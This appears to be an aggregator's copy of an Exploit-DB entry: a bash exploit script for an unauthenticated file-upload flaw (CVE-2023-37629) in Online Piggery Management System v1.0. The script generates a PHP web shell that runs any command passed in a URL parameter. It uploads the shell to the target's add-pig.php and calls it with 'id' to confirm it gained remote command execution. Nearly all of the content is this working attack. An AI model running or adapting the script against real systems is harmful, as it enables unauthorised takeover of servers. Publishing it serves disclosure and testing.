11
[webapps] Online Piggery Management System v1.0 - unauthenticated file upload vu...
source link: https://www.exploit-db.com/exploits/51598
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Online Piggery Management System v1.0 - unauthenticated file upload vulnerability
#!/bin/bash
# Exploit Title: Online Piggery Management System v1.0 - unauthenticated file upload vulnerability
# Date: July 12 2023
# Exploit Author: 1337kid
# Software Link: https://www.sourcecodester.com/php/11814/online-pig-management-system-basic-free-version.html
# Version: 1.0
# Tested on: Ubuntu
# CVE : CVE-2023-37629
#
# chmod +x exploit.sh
# ./exploit.sh web_url
# ./exploit.sh http://127.0.0.1:8080/
echo " _____ _____ ___ __ ___ ____ ________ __ ___ ___ "
echo " / __\\ \\ / / __|_|_ ) \\_ )__ /__|__ /__ / /|_ ) _ \\"
echo " | (__ \\ V /| _|___/ / () / / |_ \\___|_ \\ / / _ \\/ /\\_, /"
echo " \\___| \\_/ |___| /___\\__/___|___/ |___//_/\\___/___|/_/ "
echo " @1337kid"
echo
if [[ $1 == '' ]]; then
echo "No URL specified!"
exit
fi
base_url=$1
unauth_file_upload() {
# CVE-2023-37629 - File upload vuln
echo "Generating shell.php"
#===========
cat > shell.php << EOF
<?php system(\$_GET['cmd']); ?>
EOF
#===========
echo "done"
curl -s -F [email protected] -F submit=pwned $base_url/add-pig.php > /dev/null
req=$(curl -s -I $base_url"uploadfolder/shell.php?cmd=id" | head -1 | awk '{print $2}')
if [[ $req == "200" ]]; then
echo "Shell uploaded to $(echo $base_url)uploadfolder/shell.php"
else
echo "Failed to upload a shell"
fi
}
req=$(curl -I -s $base_url | head -1 | awk '{print $2}')
if [[ $req -eq "200" ]]; then
unauth_file_upload
else
echo "Error"
echo "Status Code: $req"
fi
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK